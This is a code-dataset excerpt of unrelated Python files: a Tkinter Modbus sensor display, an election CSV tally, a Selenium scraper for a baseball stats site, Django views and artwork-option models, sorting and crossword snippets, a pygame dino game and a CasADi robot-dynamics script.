= 1\n start = 40\n\n for i in self.tree.get_children():\n self.tree.delete(i)\n\n for record in res[-(start_regs // 2):]:\n sensor_id = record[0]\n temperature = record[1]\n date_time = record[2]\n if float(temperature) > 30.0:\n self.tree.insert(\"\", index='end', text=\"%s\" % int(sensor_id), iid=start_range,\n values=(str(date_time), int(sensor_id), float(temperature)), tags=('high',))\n if sensor_id <= 26.0:\n # ust cizgi\n x_to_add = 60\n y_lower, y_upper = 150, 170\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='red', outline='white',\n stipple='gray50', tag='rect4')\n else:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='blue', outline='white',\n stipple='gray50', tag='rect4')\n start += x_to_add\n\n if sensor_id == 26:\n start = 190\n\n elif 26.0 < sensor_id < 35.0:\n y_to_add = 40\n x_lower, x_upper = 365, 385\n if float(temperature) > 25.0:\n self.canvas.create_rectangle(x_lower, start, x_upper, start + 10, fill='red', outline='white',\n stipple='gray50', tag='rect5')\n else:\n self.canvas.create_rectangle(x_lower, start, x_upper, start + 10, fill='blue', outline='white',\n stipple='gray50', tag='rect5')\n start += y_to_add\n if sensor_id == 34:\n start = 40\n\n else:\n # alt cizgi\n x_to_add = 60\n y_lower, y_upper = 500, 520\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='red', outline='white',\n stipple='gray50', tag='rect6')\n else:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='blue', outline='white',\n stipple='gray50', tag='rect6')\n start += x_to_add\n\n else:\n self.tree.insert(\"\", index='end', text=\"%s\" % int(sensor_id), iid=start_range,\n values=(str(date_time), int(sensor_id), float(temperature)), tags=('low',))\n if sensor_id <= 26.0:\n # ust cizgi\n x_to_add = 60\n y_lower, y_upper = 150, 170\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='red', outline='white',\n stipple='gray50', tag='rect4')\n else:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='blue', outline='white',\n stipple='gray50', tag='rect4')\n start += x_to_add\n\n if sensor_id == 26:\n start = 190\n\n elif 26.0 < sensor_id < 35.0:\n y_to_add = 40\n x_lower, x_upper = 365, 385\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(x_lower, start, x_upper, start + 10, fill='red', outline='white',\n stipple='gray50', tag='rect5')\n else:\n self.canvas.create_rectangle(x_lower, start, x_upper, start + 10, fill='blue', outline='white',\n stipple='gray50', tag='rect5')\n start += y_to_add\n if sensor_id == 34:\n start = 40\n\n else:\n # alt cizgi\n x_to_add = 60\n y_lower, y_upper = 500, 520\n if float(temperature) > 30.0:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='red', outline='white',\n stipple='gray50', tag='rect6')\n else:\n self.canvas.create_rectangle(start, y_lower, start + 10, y_upper, fill='blue', outline='white',\n stipple='gray50', tag='rect6')\n start += x_to_add\n\n start_range += 1\n id_count += 1\n\n self.root.update()\n self.root.update_idletasks()\n self.tree.after(60000, self.update_window_table)\n self.canvas.pack()\n return self.root.mainloop()\n\n\ndef main():\n while True:\n rn = ModbusOop()\n rn.window_table()\n rn.update_window_table()\n sys.exit()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"version69.py","file_name":"version69.py","file_ext":"py","file_size_in_byte":16293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"567699980","text":"import os\nimport csv\n\ncsvpath = os.path.join(\"Election1.csv\")\n\nwith open(csvpath, newline=\"\") as csvfile:\n csvreader = csv.DictReader(csvfile)\n \n total_votes1 = 0\n all_votes1 = {}\n for row in csvreader:\n vote = row[\"Canadiate\"]\n if vote in all_votes1:\n all_votes1[vote] += 1\n else:\n all_votes1[vote] = 1\n\n total_votes1 += 1\n\ncsvpath = os.path.join(\"Election2.csv\")\n\nwith open(csvpath, newline=\"\") as csvfile:\n csvreader2 = csv.DictReader(csvfile)\n\n total_votes2 = 0\n all_votes2 = {}\n for row in csvreader2:\n vote2 = row[\"Candidate\"]\n if vote2 in all_votes2:\n all_votes2[vote2] += 1\n else:\n all_votes2[vote2] = 1\n\n total_votes2 += 1\n\n all_votes2.update(all_votes1)\n \n total_votes3 = total_votes1 + total_votes2\n\n for name in all_votes2:\n print(name + \" \" + str(all_votes2[name]) + \" \" + str(round((all_votes2[name] / (total_votes1 + total_votes2)) * 100)) + \"%\")\n\n winner3 = None\n winner_votes3 = 0\n for name in all_votes2:\n if all_votes2[name] > winner_votes3:\n winner3 = name \n winner_votes3 = all_votes2[name]\n\n print(\"Winner:\", winner3)\n\n print(str((total_votes1) + (total_votes2)) + \" Total Votes\")\n\n\n#text_file = open('output.txt', 'w')\n#for name in all_votes2:\n #text_file.write(name) + \" \" + str(all_votes2[name]) + \" \" + str(round((all_votes2[name] / (total_votes1 + total_votes2)) * 100)) + \"%\")\n#text_file.write(\"Winner:\", winner3)\n#text_file.write(str((total_votes1) + (total_votes2)) + \" Total Votes\")\n#text_file.close()\n\n ","sub_path":"PyPoll/Election2.py","file_name":"Election2.py","file_ext":"py","file_size_in_byte":1630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"269687655","text":"import os\nimport pickle\nimport pprint\nimport time\n\nfrom selenium import webdriver\n#from selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.common.keys import Keys\n\nBSB_URL = os.environ.get('BSB_URL')\nBSB_URL_HREF = BSB_URL.replace('http:', 'https:').replace('www.', '')\nBSB_URL_LOGIN = BSB_URL + '/login'\nBSB_URL_TEAMS = BSB_URL + '/account/teams?redirect=None&page_number=0&page_size=100'\nBSB_URL_GAMES = '/schedule/games'\nBSB_URL_ROSTER = '/roster'\nBSB_URL_PROFILE = '/profile'\nBSB_URL_STATS_BATTING = '/stats'\nBSB_URL_STATS_PITCHING = '/stats/pitching'\nBSB_URL_STATS_FIELDING = '/stats/fielding'\nBSB_URL_STATS_CATCHING = '/stats/fielding/Qualified/expanded'\nBSB_URL_RECAP = '/recap-story'\nBSB_URL_STATS = '/stats'\nBSB_URL_PLAYS = '/plays'\n\nPAGE_WAIT = 0\nPAGE_WAIT_GAME = 0\nPAGE_WAIT_APP = 0\n\npage_count = 0\n\ndef init_browser():\n # browser = webdriver.Chrome()\n\n browser = webdriver.Firefox()\n\n # Chrome headless didnt work\n # options = Options()\n # options.headless = True\n # options.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\")\n # browser = webdriver.Chrome(options=options)\n\n # Firefox headless works (not really faster)\n # options = Options()\n # options.headless = True\n # browser = webdriver.Firefox(options=options)\n\n browser.set_window_size(1000, 1000)\n return browser\n\n\ndef browser_get(browser, href, waitTime):\n global page_count\n\n browser.get(href)\n time.sleep(waitTime)\n print(href)\n # browser.save_screenshot(\"screenshot%02d.png\" % page_count)\n page_count += 1\n\ndef process_login(browser):\n browser_get(browser, BSB_URL, 0)\n\n elem = browser.find_element_by_xpath('//a[@href=\"/login\"]')\n elem.click()\n browser.implicitly_wait(10)\n\n elem = browser.find_element_by_id('email')\n os.environ.get('BSB_EMAIL')\n elem.send_keys(os.environ.get('BSB_EMAIL'))\n elem = browser.find_element_by_id('login_password')\n elem.send_keys(os.environ.get('BSB_PASSWORD'))\n elem = browser.find_element_by_id('login')\n elem.click()\n\n\ndef process_teams(browser, data):\n if len(data['teams']) == 0:\n # got to TEAMS page\n browser_get(browser, BSB_URL_TEAMS, 0)\n\n # get list of team urls\n links = browser.find_elements_by_css_selector('h2 a')\n for link in links:\n href = link.get_attribute('href')\n data['teams'].append(href)\n\n\ndef process_team_data(browser, team):\n team['profile'] = {}\n team['profile']['Stats set to:'] = ''\n team['roster'] = []\n team['stats'] = {}\n team['stats']['batting'] = []\n team['stats']['pitching'] = []\n team['stats']['fielding'] = []\n team['stats']['catching'] = []\n team['games'] = []\n\n\ndef process_team_profile(browser, team):\n href = team['href'] + BSB_URL_PROFILE\n browser_get(browser, href, PAGE_WAIT)\n\n trs = browser.find_elements_by_css_selector('tr')\n for tr in trs:\n th = tr.find_elements_by_css_selector('th')\n td = tr.find_elements_by_css_selector('td')\n profileLabel = th[0].text.replace('[?]', '').strip()\n profileValue = td[0].text\n team['profile'][profileLabel] = profileValue\n if \"RSVP\" in profileLabel:\n break\n\n\ndef process_team_roster(browser, team):\n href = team['href'] + BSB_URL_ROSTER\n browser_get(browser, href, PAGE_WAIT)\n\n ths = browser.find_elements_by_css_selector('.rosterHead th')\n trs = browser.find_elements_by_css_selector('.rosterBody tr')\n for tr in trs:\n player = {}\n td = tr.find_elements_by_css_selector('td')\n for i in range(len(ths)):\n playerLabel = ths[i].text\n playerValue = td[i].text\n player[playerLabel] = playerValue\n team['roster'].append(player)\n\ndef process_team_stats_page(browser, team, url, page):\n href = team['href'] + url\n browser_get(browser, href, PAGE_WAIT)\n\n ths = browser.find_elements_by_css_selector('thead tr th')\n trs = browser.find_elements_by_css_selector('.statTable tbody tr')\n for tr in trs:\n player = {}\n tds = tr.find_elements_by_css_selector('td')\n for i in range(len(ths)):\n playerLabel = ths[i].text\n playerValue = tds[i].text\n player[playerLabel] = playerValue\n team['stats'][page].append(player)\n\n\ndef process_games(browser, team):\n href = team['href'] + BSB_URL_GAMES\n browser_get(browser, href, PAGE_WAIT)\n\n foundHrefs = []\n links = browser.find_elements_by_css_selector('li a')\n for link in links:\n href = link.get_attribute('href')\n hrefStr = str(href)\n if hrefStr.startswith(BSB_URL_HREF + '/game-') and not hrefStr.endswith('/recap-story'):\n if not hrefStr in foundHrefs:\n game = {}\n game['href'] = hrefStr\n team['games'].append(game)\n foundHrefs.append(hrefStr)\n\n\ndef process_game_recap(browser, game):\n href = game['href'] + BSB_URL_RECAP\n browser_get(browser, href, PAGE_WAIT_GAME)\n\n game['location'] = ''\n game['date'] = ''\n game['time'] = ''\n game['away-score'] = ''\n game['home-score'] = ''\n game['recap'] = []\n\n try:\n elem = browser.find_element_by_css_selector('span#location')\n game['location'] = elem.text\n elem = browser.find_element_by_css_selector('time#headerDate')\n game['date'] = elem.text\n elem = browser.find_element_by_css_selector('time#headerTime')\n game['time'] = elem.text\n except:\n pass\n\n try:\n elem = browser.find_element_by_css_selector('div.awayScore')\n game['away-score'] = elem.text\n elem = browser.find_element_by_css_selector('div.homeScore')\n game['home-score'] = elem.text\n except:\n del game['away-score']\n del game['home-score']\n pass\n\n elem = browser.find_element_by_css_selector('h1#left')\n game['away-name'] = elem.text\n elem = browser.find_element_by_css_selector('h1#right')\n game['home-name'] = elem.text\n\n try:\n lis = browser.find_elements_by_css_selector('li.recapText')\n for li in lis:\n game['recap'].append(li.text)\n except:\n pass\n\n\nBSB_GAME_TABLE_AWAY_BATTING = 0\nBSB_GAME_TABLE_HOME_BATTING = 1\nBSB_GAME_TABLE_AWAY_PITCHING = 2\nBSB_GAME_TABLE_HOME_PITCHING = 3\n\n\ndef process_game_boxscore(browser, game):\n href = game['href'] + BSB_URL_STATS\n browser_get(browser, href, PAGE_WAIT_GAME)\n\n game['boxscore'] = {}\n game['boxscore']['away-fieldsets'] = []\n game['boxscore']['away-batting'] = {}\n game['boxscore']['away-batting']['lineup'] = []\n game['boxscore']['away-pitching'] = {}\n game['boxscore']['away-pitching']['pitchers'] = []\n game['boxscore']['home-fieldsets'] = []\n game['boxscore']['home-batting'] = {}\n game['boxscore']['home-batting']['lineup'] = []\n game['boxscore']['home-pitching'] = {}\n game['boxscore']['home-pitching']['pitchers'] = []\n\n # get 4 tables/sections\n tables = browser.find_elements_by_css_selector('table.gcTable')\n\n # table BSB_GAME_TABLE_AWAY_BATTING\n try:\n ths = tables[BSB_GAME_TABLE_AWAY_BATTING].find_elements_by_css_selector(\n 'thead tr th')\n trs = tables[BSB_GAME_TABLE_AWAY_BATTING].find_elements_by_css_selector(\n 'tbody tr')\n for tr in trs:\n player = {}\n tds = tr.find_elements_by_css_selector('td')\n for i in range(len(ths)):\n playerLabel = ths[i].text.replace('Lineup', 'name')\n playerValue = tds[i].text\n player[playerLabel] = playerValue\n game['boxscore']['away-batting']['lineup'].append(player)\n except:\n pass\n\n # table BSB_GAME_TABLE_HOME_BATTING\n try:\n ths = tables[BSB_GAME_TABLE_HOME_BATTING].find_elements_by_css_selector(\n 'thead tr th')\n trs = tables[BSB_GAME_TABLE_HOME_BATTING].find_elements_by_css_selector(\n 'tbody tr')\n for tr in trs:\n player = {}\n tds = tr.find_elements_by_css_selector('td')\n for i in range(len(ths)):\n playerLabel = ths[i].text.replace('Lineup', 'name')\n playerValue = tds[i].text\n player[playerLabel] = playerValue\n game['boxscore']['home-batting']['lineup'].append(player)\n except:\n pass\n\n # table BSB_GAME_TABLE_AWAY_PITCHING\n try:\n ths = tables[BSB_GAME_TABLE_AWAY_PITCHING].find_elements_by_css_selector(\n 'thead tr th')\n trs = tables[BSB_GAME_TABLE_AWAY_PITCHING].find_elements_by_css_selector(\n 'tbody tr')\n for tr in trs:\n player = {}\n tds = tr.find_elements_by_css_selector('td')\n for i in range(len(ths)):\n playerLabel = ths[i].text.replace('Pitching', 'name')\n playerValue = tds[i].text\n player[playerLabel] = playerValue\n game['boxscore']['away-pitching']['pitchers'].append(player)\n except:\n pass\n\n # table BSB_GAME_TABLE_HOME_PITCHING\n try:\n ths = tables[BSB_GAME_TABLE_HOME_PITCHING].find_elements_by_css_selector(\n 'thead tr th')\n trs = tables[BSB_GAME_TABLE_HOME_PITCHING].find_elements_by_css_selector(\n 'tbody tr')\n for tr in trs:\n player = {}\n tds = tr.find_elements_by_css_selector('td')\n for i in range(len(ths)):\n playerLabel = ths[i].text.replace('Pitching', 'name')\n playerValue = tds[i].text\n player[playerLabel] = playerValue\n game['boxscore']['home-pitching']['pitchers'].append(player)\n except:\n pass\n\n # get the fieldsets (sublists of 2B: 3B: etc) for away\n fieldsets = browser.find_elements_by_css_selector('div.prm fieldset')\n for fieldset in fieldsets:\n game['boxscore']['away-fieldsets'].append(fieldset.text)\n\n # get the fieldsets (sublists of 2B: 3B: etc) for away\n fieldsets = browser.find_elements_by_css_selector('div.plm fieldset')\n for fieldset in fieldsets:\n game['boxscore']['home-fieldsets'].append(fieldset.text)\n\n\ndef process_game_plays(browser, game):\n href = game['href'] + BSB_URL_PLAYS\n browser_get(browser, href, PAGE_WAIT_GAME)\n\n game['plays'] = []\n\n trs = browser.find_elements_by_css_selector('#playByPlayContainer tr')\n for tr in trs:\n temp = tr.text.replace(u\"\\u2022\", '-').replace(u\"\\u01c0\", '|')\n game['plays'].append(temp)\n\n\n\n\ndef match_alias(name, alias):\n for a in alias:\n if a in name:\n return True\n False\n\ndef process_games_with_alias(browser, team, alias, year, season, data):\n href = team + BSB_URL_GAMES\n browser_get(browser, href, PAGE_WAIT)\n\n if year and not year in href:\n return\n\n if season and not season in href:\n return\n\n foundHrefs = []\n links = browser.find_elements_by_css_selector('li a')\n for link in links:\n href = link.get_attribute('href')\n hrefStr = str(href)\n if hrefStr.startswith(BSB_URL_HREF + '/game-') and not hrefStr.endswith('/recap-story'):\n if not hrefStr in foundHrefs:\n if (match_alias(link.text, alias)):\n print(team)\n print(link.text)\n game = {}\n game['team_url'] = team\n game['alias_match'] = link.text\n game['href'] = hrefStr\n data['games'].append(game)\n foundHrefs.append(hrefStr)\n\n\ndef process_teams_with_alias(browser, data, alias, year, season):\n if len(data['teams']) == 0:\n # got to TEAMS page\n browser.get(BSB_URL_TEAMS)\n time.sleep(PAGE_WAIT)\n\n # get list of team urls\n links = browser.find_elements_by_css_selector('h2 a')\n for link in links:\n href = link.get_attribute('href')\n data['teams'].append(href)\n\n # parse all teams for games vs our team in alias\n for team in data['teams']:\n process_games_with_alias(browser, team, alias, year, season, data)\n","sub_path":"bsb_site.py","file_name":"bsb_site.py","file_ext":"py","file_size_in_byte":11357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"516482167","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom django.template import loader\n# render와 HttpResponse의 차이?\n\n# def login(request):\n# latest_question_list = Question.objects.order_by('-pub_date')[:5]\n# context = {'latest_question_list': latest_question_list}\n# return render(request, 'polls/index.html', context)\n\n# render() 함수는 request 객체를 첫번째 인수로 받고, 템플릿 이름을 두번째 인수로 받으며,\n# context 사전형 객체를 세전째 선택적(optional) 인수로 받습니다. \n# 인수로 지정된 context로 표현된 템플릿의 HttpResponse 객체가 반환됩니다.\n\ndef main(request):\n template = loader.get_template('main/main.html')\n context = {\n 'testData' : \"testData is testData\"\n }\n return HttpResponse(template.render(context, request))\n\n\ndef login(request):\n template = loader.get_template('login/login.html')\n context = {\n 'testData' : \"testData is testData\"\n }\n return HttpResponse(template.render(context, request))\n\ndef register(request):\n template = loader.get_template('login/register.html')\n context = {\n 'testData' : \"testData is testData\"\n }\n return HttpResponse(template.render(context, request))\n\ndef mypage(request):\n template = loader.get_template('mypage/mypage.html')\n context = {\n 'testData' : \"testData is testData\"\n }\n return HttpResponse(template.render(context, request))\n","sub_path":"config/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"552052800","text":"#!/usr/bin/env python\n\n\ndef insertion_sort(li):\n \"\"\"Return sorted list using the insertion_sort algorithm.\n\n Worst time complexity: O(n^2)\n Best time complexity: O(n)\n \"\"\"\n for i in range(1, len(li)):\n j = i\n key = li[i]\n while j > 0 and li[j - 1] > key:\n li[j] = li[j - 1]\n j = j - 1\n li[j] = key\n\n return li\n\n\n# Test the program\n# -----------------\nprint(insertion_sort([15, 5, 10, 2, 6]))\n","sub_path":"askme/questions/Python/algorithms/insertion_sort/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"309781289","text":"from bartez import boards\nfrom bartez.crossword import Crossworld\nfrom bartez.crossword import SquareValues\nfrom bartez.solver import CrosswordSolver\nfrom bartez.word_dictionary import Dictionary\n\n\ndef get_dictionary():\n return Dictionary(\"italian\", \"words_test_corriere.txt\")\n\n\ndef main():\n dictionary = get_dictionary()\n print(\"done\")\n print(\"words count: \", dictionary.get_words_count())\n board, geometry = boards.get_default_board()\n crossword = Crossworld(geometry[0], geometry[1])\n\n for p in board:\n r, c = p[0], p[1]\n crossword.set_value(r, c, SquareValues.block)\n\n crossword.prepare()\n crossword.print_crossword()\n\n solver = CrosswordSolver(dictionary, crossword)\n solver.run()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bartez/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"523705398","text":"# -*- coding: utf-8 -*-\nfrom django.db import models\nfrom django.utils.html import format_html\n\nfrom stock.models import UnitStock\n\n\nclass Option(models.Model):\n USD = 'USD'\n EUR = 'EUR'\n KRW = 'KRW'\n CURRENCY_CHOICES = (\n (USD, 'USD'),\n (EUR, 'EUR'),\n (KRW, 'KRW'),\n )\n artwork = models.OneToOneField(\n 'artwork.Artwork', verbose_name='해당제품', related_name='artwork_option')\n print_choice = models.ForeignKey(\n 'artwork.PrintType', verbose_name='인쇄방식', null=True, blank=True)\n width = models.FloatField(verbose_name='가로', default=0,\n help_text='* 인치로 입력해 주세요. 센치로 입력을 원할 경우, KRW 선택, 실제 판매가 입력')\n height = models.FloatField(verbose_name='세로', default=0,\n help_text='* 인치로 입력해 주세요. 센치로 입력을 원할 경우, KRW 선택, 실제 판매가 입력')\n currency = models.CharField(\n verbose_name='통화타입', max_length=8, choices=CURRENCY_CHOICES, default=USD, help_text='* 완제품, 반품액자일 경우만 KRW를 선택해 주세요.')\n im_price = models.FloatField(verbose_name='업체 판매가', default=0,\n help_text='* 완제 및 반품액자는 KRW 선택 후, 판매가격 입력')\n\n class Meta:\n db_table = 'option_manager'\n verbose_name = '옵션'\n verbose_name_plural = '수입그림(옵션) 관리'\n\n def __unicode__(self):\n return self.artwork.title\n\n def save(self, *args, **kwargs):\n is_new = True if not self.id else False\n super(Option, self).save(*args, **kwargs)\n if not is_new:\n if not self.width == 0 and not self.height == 0 and not self.im_price == 0 and self.print_choice:\n if self.currency == 'KRW':\n artwork_code = self.artwork.artwork_code\n num = len(UnitStock.objects.filter(option=self)) + 1001\n num = str(num)\n num_id = num[1:]\n op_code = artwork_code + '_' + num_id\n w_size = self.width\n h_size = self.height\n price = self.im_price\n\n else:\n artwork_code = self.artwork.artwork_code\n num = len(UnitStock.objects.filter(option=self)) + 1001\n num = str(num)\n num_id = num[1:]\n op_code = artwork_code + '_' + num_id\n w_size = round(float(self.width) * 2.54, 1)\n h_size = round(float(self.height) * 2.54, 1)\n price = round(float(\n self.im_price) * self.artwork.related_com.math_rule * self.artwork.related_com.applied_curr, -3)\n\n op_unit = UnitStock(option=self)\n op_unit.option_code = op_code\n op_unit.print_selected = self.print_choice.title\n op_unit.width_cm = w_size\n op_unit.height_cm = h_size\n op_unit.im_price_info = self.currency + \\\n ' ' + str(self.im_price)\n op_unit.price = price\n op_unit.order = 999\n op_unit.save()\n\n self.width = 0\n self.height = 0\n self.im_price = 0\n self.save(\n update_fields=['print_choice', 'width', 'height', 'im_price'])\n\n option_prices = []\n option_units = UnitStock.objects.filter(option=self)\n if option_units:\n for ou in option_units:\n option_prices.append(ou.price)\n\n pp = min(option_prices)\n pick_unit = UnitStock.objects.filter(option=self, price=pp)[0]\n self.artwork.min_w_cm = pick_unit.width_cm\n self.artwork.min_h_cm = pick_unit.height_cm\n self.artwork.min_a_price = pick_unit.price\n self.artwork.save(\n update_fields=['min_w_cm', 'min_h_cm', 'min_a_price'])\n\n def code_and_id(self):\n return format_html(u'

%s

ID: %s

' % (self.artwork.artwork_code, self.artwork.id))\n\n def image_thumb(self):\n if not self.artwork.image:\n return format_html(u'

이미지없음

')\n else:\n return format_html('\"product_images\"' % (self.artwork.image.url, self.artwork.image.url))\n\n def artwork_info(self):\n if self.artwork.division == 1:\n division = u'수입그림'\n elif self.artwork.division == 2:\n division = u'출력그림'\n elif self.artwork.division == 3:\n division = u'반품액자'\n else:\n division = u'완제품'\n\n return format_html(u'

%s

%s

' % (self.artwork.title, division))\n\n def artwork_additional(self):\n if self.artwork.code_from_com:\n company = self.artwork.code_from_com\n else:\n company = ' '\n if self.artwork.artist:\n kor = self.artwork.artist.name_kor\n eng = self.artwork.artist.name_eng\n else:\n kor = u'작가 선택전'\n eng = u'작가 선택전'\n return format_html('

%s - %s

%s

%s

' % (self.artwork.related_com.com_code, company, eng, kor))\n\n def stock_counter(self):\n if len(UnitStock.objects.filter(option=self)) == 0:\n return format_html('

오류

')\n else:\n return format_html('

%s

' % UnitStock.objects.filter(option=self)[0].now_stock)\n\n def option_counter(self):\n op_count = len(UnitStock.objects.filter(option=self))\n return format_html('

%s

' % op_count)\n\n def go_back_artwork(self):\n return format_html('작품관리' % (self.artwork.id))\n\n def option_size_info(self):\n unit = UnitStock.objects.filter(option=self)\n if len(unit) == 0:\n return u'옵션없음'\n else:\n unit = UnitStock.objects.filter(option=self)[0]\n return format_html('

%s X %s cm

' % (unit.width_cm, unit.height_cm))\n\n def this_is_sales(self):\n if self.artwork.on_sales == 1:\n sales_status = '/static/admin/img/icon-yes.gif'\n else:\n sales_status = '/static/admin/img/icon-no.gif'\n\n return format_html(u'\"yes_no_sign\"' % (sales_status))\n\n def this_is_active(self):\n if self.artwork.is_active:\n active_status = '/static/admin/img/icon-yes.gif'\n else:\n active_status = '/static/admin/img/icon-no.gif'\n\n return format_html(u'\"yes_no_sign\"' % (active_status))\n\n code_and_id.short_description = '제품코드'\n code_and_id.allow_tags = True\n code_and_id.admin_order_field = 'artwork__artwork_code'\n image_thumb.short_description = '이미지'\n image_thumb.allow_tags = True\n artwork_info.short_description = '제품정보'\n artwork_info.allow_tags = True\n artwork_additional.short_description = '제품부가정보'\n artwork_additional.allow_tags = True\n stock_counter.short_description = '재고'\n stock_counter.allow_tags = True\n option_counter.short_description = '옵션 수'\n option_counter.allow_tags = True\n go_back_artwork.short_description = '링크'\n go_back_artwork.allow_tags = True\n option_size_info.short_description = '사이즈(cm)'\n option_size_info.allow_tags = True\n this_is_sales.short_description = '판매'\n this_is_sales.allow_tags = True\n this_is_sales.admin_order_field = 'artwork__on_sales'\n this_is_active.short_description = '전시'\n this_is_active.allow_tags = True\n this_is_active.admin_order_field = 'artworks__is_active'\n","sub_path":"option/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"643677887","text":"import pygame\nimport time\nimport random\nfrom objects import *\n\ndisplay_width = 1200\ndisplay_height = 350\nCLOCK_SPEED = 60\n\npygame.init()\n\ngameDisplay = pygame.display.set_mode((display_width,display_height))\npygame.display.set_caption('DinoRun')\nclock = pygame.time.Clock()\n\ndistance = 400\nspeed = 7\n\nbgcolor = (64,202,201)\nfcolor = (244,212,66)\nfloorH = 50\nbaseH = display_height-floorH+4-50\n\nsprites = {} #same as spritesI just with pygame objects\nspritesI = {\n \"floor\": [\"sprites/floor.png\"], #1200x12\n \"clouds\": [\"sprites/clouds.png\"], #46x13\n \"crouch\": [\"sprites/crouch1.png\",\"sprites/crouch2.png\"], #65x50\n \"run\": [\"sprites/idle.png\",\"sprites/0legup.png\",\"sprites/1legup.png\"], #50x50 3px LEFT, RIGHT, 2px DOWN, 1 px UP\n \"bird\": [\"sprites/bird1.png\",\"sprites/bird2.png\"], #46x40\n \"cactusS\": [\"sprites/cactusS1.png\",\"sprites/cactusS2.png\"], #17x35\n \"cactusL\": [\"sprites/cactusL1.png\",\"sprites/cactusL2.png\"] #25x48\n}\n\ndef loadAssets():\n global sprites\n for x,y in spritesI.items():\n pom = []\n sprites[x] = pom\n for k in y:\n sprites[x].append(pygame.image.load(k))\n\ndef text_objects(text, font):\n textSurface = font.render(text, True, (0,0,0))\n return textSurface, textSurface.get_rect()\n\ndef message_display(text,x,y):\n largeText = pygame.font.Font('freesansbold.ttf',18)\n TextSurf, TextRect = text_objects(text, largeText)\n TextRect = (x,y)\n gameDisplay.blit(TextSurf, TextRect)\n\ndef draw(smth,x,y):\n gameDisplay.blit(smth,(x,y))\n\ndef drawBG():\n pygame.draw.rect(gameDisplay,bgcolor,[0,0,display_width,display_height-floorH])\n pygame.draw.rect(gameDisplay,fcolor,[0,display_height-floorH,display_width,display_height])\n draw(sprites[\"floor\"][0],0,display_height-floorH)\n\ndef drawObj(score):\n for x in objects:\n if x[0]<1200:\n if x[1] == 0:\n for i in range(x[2]+1):\n draw(sprites[\"cactusL\"][0],x[0]+25*i,baseH)\n if x[1] == 1:\n if x[2]%2 == 0:\n draw(sprites[\"bird\"][(score//5)%2],x[0],baseH-8)\n if x[2]%2 == 1:\n draw(sprites[\"bird\"][(score//5)%2],x[0],baseH-25)\n x[0] -= speed\n if x[0]<-100:\n del objects[0]\n objects.append([objects[-1][0]+distance,random.randrange(2),random.randrange(4)])","sub_path":"drawing.py","file_name":"drawing.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"21524897","text":"import imp\nfrom casadi import *\nimport numpy as np\nfrom SrdPy import get\nfrom SrdPy.Controllers import LTI_CLQE\nfrom SrdPy.Controllers.Observers.LTI_CLQE import LTI_System\ntol = 10**(-5)\n\n# [0, 0, phi_1, phi_2]\nq = [0, 0, 0, 0]\nv = np.zeros(len(q))\nx = vertcat(q,v)\nu = 0\n\nHandler_dynamics_generalized_coordinates_model = get('handlerGeneralizedCoordinatesModel')\nHandler_dynamics_Linearized_Model = get('handlerLinearizedModel')\nHandler_Constraints_Model = get('handlerConstraints')\n\n\nk = Handler_Constraints_Model.dofConstraint\ndof = Handler_dynamics_generalized_coordinates_model.dofConfigurationSpaceRobot\nm = Handler_dynamics_generalized_coordinates_model.dofControl\n\nH = Handler_dynamics_generalized_coordinates_model.getJointSpaceInertiaMatrix(q)\nc = Handler_dynamics_generalized_coordinates_model.getBiasVector(q, v)\nT = Handler_dynamics_generalized_coordinates_model.getControlMap(q)\n\nF = Handler_Constraints_Model.getJacobian(q)\ndF = Handler_Constraints_Model.getJacobianDerivative(q,v)\n\niH = pinv(H)\nf0 = vertcat(v,iH@(T*u - c))\n\nM = vertcat(horzcat(H, -F.T),\n horzcat(F, SX.zeros(k,k)))\niM = pinv(M)\n\nA = Handler_dynamics_Linearized_Model.getA(q, v, u, iM)\nB = Handler_dynamics_Linearized_Model.getB(q, v, iM)\n\ng = f0 - A @ x - B @ u\n\nG = vertcat(horzcat(SX.zeros(k, dof), F),\n horzcat(F, dF))\n\n\n\nC_case0 = np.array([ 0, 0, 0, 1, 0, 0, 0, 0 ] )\n \nC_case1 = np.array([\n [0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 1, 0],\n [0, 0, 0, 0, 0, 0, 0, 1]])\n \nC_case2 = np.array([\n [1, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, 0],\n [0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 1, 0],\n [0, 0, 0, 0, 0, 0, 0, 